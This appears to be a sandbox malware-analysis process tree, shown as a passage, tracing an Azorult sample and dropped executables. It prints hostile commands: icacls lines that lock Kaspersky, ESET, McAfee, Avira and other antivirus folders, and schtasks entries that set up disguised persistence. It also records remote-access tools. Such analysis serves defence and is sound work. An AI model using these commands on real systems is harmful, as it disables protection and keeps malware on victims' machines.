C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny %username%:(OI)(CI)(F)3⤵PID:1384
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:3796
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)3⤵PID:2384
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:2756
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny %username%:(OI)(CI)(F)3⤵
- System Location Discovery: System Language Discovery
PID:2472 -
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Kaspersky Lab" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:3032
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)3⤵PID:4868
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:2224
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny %username%:(OI)(CI)(F)3⤵PID:712
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Kaspersky Lab" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:1360
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)3⤵
- System Location Discovery: System Language Discovery
PID:752 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:4568
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:1960
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Doctor Web" /deny %username%:(OI)(CI)(F)3⤵PID:3472
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Doctor Web" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:992
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\grizzly" /deny %username%:(OI)(CI)(F)3⤵PID:4584
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:400
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\grizzly" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:3116
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Cezurity" /deny %username%:(OI)(CI)(F)3⤵PID:2060
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Cezurity" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:5096
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Cezurity" /deny %username%:(OI)(CI)(F)3⤵PID:3144
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Cezurity" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:3584
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\McAfee" /deny %username%:(OI)(CI)(F)3⤵PID:1172
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\McAfee" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:4360
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\McAfee" /deny %username%:(OI)(CI)(F)3⤵PID:3732
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Common Files\McAfee" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:3108
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Avira" /deny %username%:(OI)(CI)(F)3⤵PID:3900
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:4584
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Avira" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:3580
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny %username%:(OI)(CI)(F)3⤵PID:3088
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:1344
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:4416
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny %username%:(OI)(CI)(F)3⤵
- System Location Discovery: System Language Discovery
PID:880 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:4360
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\ESET" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:2700
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)3⤵PID:100
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:4380
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny %username%:(OI)(CI)(F)3⤵PID:960
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:4968
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\ESET" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:3920
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)3⤵PID:2932
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)4⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:4212
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Panda Security" /deny %username%:(OI)(CI)(F)3⤵PID:3084
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:3032
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Panda Security" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:4356
-
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\SystemC" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC MINUTE /MO 13⤵
- Scheduled Task/Job: Scheduled Task
PID:2536 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:3584
-
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Cleaner" /TR "C:\Programdata\WindowsTask\winlogon.exe" /SC ONLOGON /RL HIGHEST3⤵
- Scheduled Task/Job: Scheduled Task
PID:3440 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:4664
-
-
-
-
C:\Users\Admin\Downloads\Azorult.exe"C:\Users\Admin\Downloads\Azorult.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:708
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --field-trial-handle=3452,i,6748960228899733408,12447734808532971626,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4316 /prefetch:12⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
PID:1844
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --field-trial-handle=6224,i,6748960228899733408,12447734808532971626,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=6260 /prefetch:12⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
PID:4584
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --field-trial-handle=6500,i,6748960228899733408,12447734808532971626,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=6488 /prefetch:12⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
PID:2148
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --field-trial-handle=5668,i,6748960228899733408,12447734808532971626,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=6024 /prefetch:12⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
PID:3032
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=6016,i,6748960228899733408,12447734808532971626,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=6532 /prefetch:82⤵
- Loads dropped DLL
PID:560
-
-
C:\Windows\System32\msiexec.exe"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\Downloads\BabylonClient12.msi"2⤵
- Blocklisted process makes network request
- Enumerates connected drives
PID:5024
-
-
C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"1⤵PID:1396
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc1⤵PID:2340
-
C:\ProgramData\Windows\rutserv.exeC:\ProgramData\Windows\rutserv.exe1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:320 -
C:\ProgramData\Windows\rfusclient.exeC:\ProgramData\Windows\rfusclient.exe2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:4912 -
C:\ProgramData\Windows\rfusclient.exeC:\ProgramData\Windows\rfusclient.exe /tray3⤵
- Executes dropped EXE
- Suspicious behavior: SetClipboardViewer
PID:4516
-
-
-
C:\ProgramData\Windows\rfusclient.exeC:\ProgramData\Windows\rfusclient.exe /tray2⤵
- Executes dropped EXE
PID:3148
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:4872
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:408
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:980
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV12⤵PID:1908
-
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵
- Executes dropped EXE
PID:2000
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:4896
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵
- Executes dropped EXE
PID:2968
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -s TermService1⤵PID:4368
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -s TermService1⤵
- Loads dropped DLL
PID:736
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:3340
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵
- Executes dropped EXE
PID:1344
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:2788
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵
- Executes dropped EXE
PID:3344
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:3108
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵
- Executes dropped EXE
PID:4448
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:116
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵
- Executes dropped EXE
PID:988
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:3672
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵
- Executes dropped EXE
PID:2968
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:2432
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵
- Executes dropped EXE
PID:2312
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:4664
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵
- Executes dropped EXE
PID:4564
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:4720
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵
- Executes dropped EXE
PID:2392
-
-
C:\Programdata\RealtekHD\taskhostw.exeC:\Programdata\RealtekHD\taskhostw.exe1⤵
- Executes dropped EXE
PID:4444
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:4608
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵
- Executes dropped EXE
PID:100
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:4044
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵
- Executes dropped EXE
PID:2344
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:4344
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵
- Executes dropped EXE
PID:3988
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:2144
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵
- Executes dropped EXE
PID:632
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:3732
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵
- Executes dropped EXE
PID:2312
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:1712
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵
- Executes dropped EXE
PID:2536
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:2964
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵
- Executes dropped EXE
PID:3580
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:452
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵
- Executes dropped EXE
PID:4608
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:2960
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵
- Executes dropped EXE
PID:2812
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:3940
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵
- Executes dropped EXE
PID:3516
-
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Checks SCSI registry key(s)
- Suspicious use of SendNotifyMessage
PID:3472
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:4676
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵
- Executes dropped EXE
PID:1548
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:1792
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵
- Executes dropped EXE
PID:3220
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:4444
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵
- Executes dropped EXE
PID:4448
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:4752
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵
- Executes dropped EXE
PID:3624
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:2728
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵
- Executes dropped EXE
PID:2528
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:1596
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵
- Executes dropped EXE
PID:3564
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:3052
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵
- Executes dropped EXE
PID:2108
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:2144
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵
- Executes dropped EXE
PID:756
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:4720
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵
- Executes dropped EXE
PID:4752
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:3028
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵
- Executes dropped EXE
PID:1692
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:4196
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵PID:3484
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:3508
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵PID:3892
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:232
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵PID:2068
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:216
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵PID:1548
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:4436
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵PID:836
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:1632
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵PID:560
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:4236
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵PID:2964
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:1080
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵PID:4592
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:1192
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵PID:2292
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:3144
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵PID:3892
-
-
C:\Programdata\RealtekHD\taskhostw.exeC:\Programdata\RealtekHD\taskhostw.exe1⤵PID:1460
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:4428
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵PID:4464
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:232
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵PID:216
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:4116
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵PID:3472
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:4148
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵PID:928
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:8
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵PID:2896
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:5016
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵PID:4404
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:1976
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵PID:3088
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:3472
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵PID:64
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:4016
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵PID:100
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:216
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵PID:3580
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:664
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵PID:1112
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:2260
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵PID:4720
-
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Checks SCSI registry key(s)
PID:5024
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:4740
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵PID:2812
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:836
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵PID:1964
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:4988
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵PID:2896
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:3580
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵PID:4916
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:1112
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe2⤵PID:1180
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe1⤵PID:3012
-
